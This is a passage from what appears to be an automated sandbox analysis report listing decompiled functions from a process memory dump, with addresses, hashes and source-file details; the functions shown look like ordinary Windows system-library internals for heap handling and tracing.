					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x050c90af
0x050c90b8
0x050c90bb
0x050c90bf
0x050c90c2
0x050c90c2
0x050c90c8
0x050c90cb
0x050c90cd
0x051014d7
0x051014eb
0x051014eb
0x00000000
0x051014eb
0x051014db
0x051014e6
0x00000000
0x051014f2
0x051014e8
0x00000000
0x051014e8
0x050c90d8
0x050c90da
0x050c90dd
0x050c90e5
0x00000000
0x050c9139
0x050c90fa
0x050c90fe
0x050c9142
0x00000000
0x050c9142
0x050c9104
0x050c9107
0x050c910b
0x050c9110
0x050c9118
0x050c9147
0x050c9148
0x050c914f
0x050c9150
0x050c9151
0x050c9152
0x050c9156
0x050c915d
0x050c9160
0x050c9168
0x050c916c
0x050c91bc
0x050c91be
0x00000000
0x050c91be
0x050c916e
0x050c9173
0x050c9176
0x00000000
0x00000000
0x050c917c
0x050c9180
0x050c91b5
0x00000000
0x050c91b5
0x050c9182
0x050c9185
0x050c9189
0x00000000
0x00000000
0x050c918e
0x050c9190
0x050c9198
0x00000000
0x00000000
0x050c91a0
0x00000000
0x050c91ad
0x050c91ad
0x050c91b0
0x050c91b1
0x00000000
0x050c9185
0x050c911a
0x050c911c
0x050c911f
0x050c9125
0x050c9127
0x00000000

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 99e91232efb54a5243560705d04daac325a4ffac31dae782c74696136214a3a8
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 25216A71A40204EFDB20DF59D845EAEBBF9FB54310F1488AAE949A7250D370AD00CB90

Uniqueness

Uniqueness Score: -1.00%

Function 050B3B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E050B3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x51784c4; // 0x0
				_v12 = 1;
				_v8 =  *0x51784c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L050A4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x51784c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E050CAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E050CFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x51784c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x51784c4; // 0x0
					L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x050b3b89
0x050b3b96
0x050b3ba1
0x050b3bab
0x050b3bb5
0x050b3bb9
0x050f6298
0x050b3bbf
0x050b3bc2
0x050b3bc3
0x050b3bc9
0x050b3bca
0x050b3bcc
0x050b3bcd
0x050b3bd4
0x050b3bd6
0x050b3bdb
0x050b3bea
0x050b3bf7
0x050b3bfb
0x050b3bff
0x050b3c09
0x050b3c0a
0x050b3c0b
0x050b3c0f
0x050b3c14
0x050b3c18
0x050b3c18
0x050b3bfb
0x050b3c1b
0x050b3c30
0x050b3c30
0x050b3c3d

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a742a8ede699c24a93f43a5c8894c163eebbefa440319f2f8b86d9fa96d6345
Instruction ID: 0f998ff5401aacd9bb9a1211593848fabd972e837d32e3ebc5c6aac8a5fd9c6d
Opcode Fuzzy Hash: 1a742a8ede699c24a93f43a5c8894c163eebbefa440319f2f8b86d9fa96d6345
Instruction Fuzzy Hash: 24218072A00508AFD701DF98DD85FAEBBBDFB44708F250468E505AB251D7B1AD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05106CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E05106CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E050A7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E050A7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x5065c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E050BF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E050BF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E05107016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L050A2400( &_v52);
								}
								_t21 = L050A2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x05106cfb
0x05106d00
0x05106d02
0x05106d06
0x05106d0a
0x05106d0e
0x05106d19
0x05106d2b
0x05106d1b
0x05106d24
0x05106d24
0x05106d33
0x05106d39
0x05106d46
0x05106d4f
0x05106d61
0x05106d51
0x05106d5a
0x05106d5a
0x05106d69
0x05106d6b
0x05106d6d
0x05106d6f
0x05106d6f
0x05106d74
0x05106d79
0x05106d7a
0x05106d7f
0x05106d82
0x05106d88
0x05106d89
0x05106d90
0x05106d94
0x05106da7
0x05106db1
0x05106db1
0x05106dbb
0x05106dbb
0x05106d90
0x05106d69
0x05106d46
0x05106dc6

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8769a3f20fd92ecf79c5a5b4d77d8cce570e1b1cb03d7d825f015bea39d0f05
Instruction ID: 2386db748791cd52d74d8cf185fd7779b4b3b3502b5fa665407d0bcb260b6f05
Opcode Fuzzy Hash: a8769a3f20fd92ecf79c5a5b4d77d8cce570e1b1cb03d7d825f015bea39d0f05
Instruction Fuzzy Hash: 502125325082459BC311DF68D948BABB7ECFF91250F040466FD81C7290E774D91AC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0515070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0515070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E051507DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0514AFDE( &_v8,  &_v12);
					E05151293(_t38, _v28, _t60);
					if(E050A7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E051414FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x0515071b
0x05150724
0x05150734
0x05150738
0x0515074b
0x0515074b
0x05150753
0x05150753
0x05150759
0x0515075d
0x05150774
0x05150779
0x0515077d
0x05150789
0x05150795
0x051507a7
0x05150797
0x051507a0
0x051507a0
0x051507af
0x051507c4
0x051507cd
0x051507cd
0x051507af
0x051507dc

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 10e3f5f505e6260831a3983caa00cdd6bf74ba68f1467790883b304eae3ac27b
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: 1821D336308200AFD715DF68C888A6ABBA6FBC4760F048569FDA58B381D730D949CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05107794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E05107794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x5177b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L050A4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E050CF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E050A7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E050C9AE0();
					_t24 = L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x05107799
0x0510779a
0x0510779b
0x051077a3
0x051077ab
0x051077ae
0x051077b1
0x051077b1
0x051077bf
0x051077c4
0x051077c8
0x051077ce
0x051077d4
0x051077e0
0x051077e0
0x051077d6
0x051077d6
0x051077de
0x00000000
0x00000000
0x051077de
0x051077e5
0x051077f0
0x051077f3
0x051077f6
0x051077fd
0x05107800
0x0510780c
0x05107818
0x0510782b
0x0510781a
0x05107823
0x05107823
0x05107830
0x05107831
0x05107838
0x0510783d
0x0510783e
0x0510784f
0x0510784f
0x0510785a

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b1582960cb2ed24106c770bd1202e0dae5e2b5d4217508185b8351eec0e85f0
Instruction ID: 4adfaa5586c6722d0cb4d9f5709db8d11b6d6fe7b57fa143dff9b3bf7f54f3a9
Opcode Fuzzy Hash: 0b1582960cb2ed24106c770bd1202e0dae5e2b5d4217508185b8351eec0e85f0
Instruction Fuzzy Hash: 8B21A172A00644ABC725DFA9D884EABBBB9FF48340F10456DF50AC7790D734E900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 050AAE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E050AAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E050A7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E050A7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E050A7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E050A7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E05107794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x050aae78
0x050aae7c
0x050aae7e
0x050aae81
0x050aae86
0x050aae8d
0x050f2691
0x050aae93
0x050aae93
0x050aae93
0x050aae98
0x050aae9d
0x050f26a2
0x050f26b4
0x050f26a4
0x050f26ad
0x050f26ad
0x050f26b9
0x00000000
0x050f26bb
0x00000000
0x050f26bb
0x050aaea3
0x050aaea3
0x050aaea3
0x050aaeaa
0x050f26c0
0x050f26c9
0x050f26c9
0x050aaeb3
0x050f26d4
0x050f26e1
0x00000000
0x00000000
0x050f26e7
0x050f26ee
0x050f26f0
0x050f26f9
0x050f26f9
0x050f2702
0x050f2708
0x050f2708
0x050f270b
0x050f270f
0x050f2711
0x050f2711
0x050f2725
0x050f2725
0x00000000
0x050aaeb9
0x050aaeb9
0x050aaebf
0x050aaebf
0x050aaeb3

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 0fd586e4f329b45599b75781aa741c190de1a4c9eac8faf3987e2d6761a5eab5
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 9E21D1367056829FD726DBA9E948B7D77EAFF44240F0900A0DE048BAA2E735DC40C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 050BFD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E050BFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E050976E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L050A4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x050bfd9b
0x050bfda0
0x050bfda1
0x050bfdab
0x050bfdad
0x050bfdb0
0x050bfdb8
0x050bfe0f
0x050bfde6
0x050bfde9
0x050bfdec
0x050fc0c0
0x050bfdfe
0x050bfe06
0x050bfe06
0x050fc0c8
0x050bfe2d
0x050bfe2d
0x00000000
0x050bfe2d
0x050fc0d1
0x050fc0e0
0x050fc0e5
0x050fc0e5
0x050fc0e8
0x00000000
0x050fc0e8
0x050bfdf4
0x00000000
0x00000000
0x050bfdf6
0x050bfdfa
0x050bfe1a
0x050bfe1f
0x050bfe1f
0x050bfdfc
0x00000000
0x050bfdfc
0x050bfdcc
0x050bfdd0
0x050bfe26
0x00000000
0x050bfe26
0x050bfdd8
0x050bfddb
0x050bfddd
0x050bfde0
0x00000000

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: eec511e31015a00cb02967e8eef91d112e759790f1962934129dcb10854a1aa2
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: A6217F72604A45DBE735CF49E980EBAB7E6FB94A10F24856EE94687610D7719C00CB80

Uniqueness

Uniqueness Score: -1.00%

Function 050BB390, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E050BB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E050A2280(_t12, 0x5178608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E050C00C2(0x5178608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x050bb395
0x050bb3a2
0x050bb3a5
0x050bb3aa
0x050bb3b2
0x050bb3ba
0x050bb3bd
0x050bb3c0
0x050bb3c4
0x050bb3c9
0x050fa3e9
0x050fa3ed
0x050fa3f0
0x050fa3ff
0x050fa403
0x050fa409
0x00000000
0x00000000
0x050fa40b
0x050fa40b
0x050fa40f
0x050fa415
0x050fa423
0x050fa423
0x050fa415
0x050bb3d1
0x050bb3e8
0x050bb3e8
0x050bb3d9

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 713b26d3bba5f83b06fb16a8cf2e269a08c0eb28ce4faa7137dc57f5f19597f2
Instruction ID: efefc22ff4811d02b955d8eb27549941a45550e2d47b3b089d1456f5f9d2e94a
Opcode Fuzzy Hash: 713b26d3bba5f83b06fb16a8cf2e269a08c0eb28ce4faa7137dc57f5f19597f2
Instruction Fuzzy Hash: E8114C37305110ABCB29CA54AEC19AF76B7EBC5A30B254239EE1697780DD756C02C794

Uniqueness

Uniqueness Score: -1.00%

Function 05089240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E05089240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x515f708);
				E050DD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E050C95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E050C95D0();
				_t33 =  *0x51784c4; // 0x0
				L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x51784c4; // 0x0
				L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x51784c4; // 0x0
				E050A2280(L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x51786b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E050C95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E050C95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E05089325();
					_t50 =  *0x51784c4; // 0x0
					return E050DD0D1(L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x05089240
0x05089242
0x05089247
0x0508924c
0x0508924e
0x05089255
0x05089257
0x0508925a
0x0508925f
0x0508925f
0x05089266
0x05089271
0x05089276
0x05089279
0x0508927e
0x05089295
0x0508929a
0x050892b1
0x050892b6
0x050892d7
0x050892dc
0x050892e0
0x050892e6
0x050892e8
0x050892ee
0x05089332
0x05089333
0x05089337
0x05089338
0x0508933a
0x0508933a
0x0508933d
0x05089342
0x05089342
0x05089345
0x05089349
0x0508934e
0x05089352
0x05089357
0x050892f4
0x050892f4
0x050892f6
0x050892f9
0x05089300
0x05089306
0x05089324
0x05089324

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 92c52db61dfae494353d22af0245209faf00dc671676013b6316fcd2c42c4632
Instruction ID: 819d2f3444373e3778a1ce6de16d992364d0ae201d9afc9970de105225b7ce80
Opcode Fuzzy Hash: 92c52db61dfae494353d22af0245209faf00dc671676013b6316fcd2c42c4632
Instruction Fuzzy Hash: B1213172151600EFC722FF68EA44FADBBF9FF14704F144568E14A866A1CB34E941DB44

Uniqueness

Uniqueness Score: -1.00%

Function 05114257, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E05114257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x51608d0);
				E050DD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E051141E8(__ebx, __edi, __ecx, _t39);
				E0509EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x51787e4;
					_t18 =  *0x51787e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x5175cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x51787e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x51787e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L05087055(_t31 + 0xfffffff8);
								_t24 =  *0x51787e0; // 0x0
								_t18 = _t24 - 1;
								 *0x51787e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x5175cd0;
				if( *0x5175cd0 <= 0) {
					L05087055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x51787e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
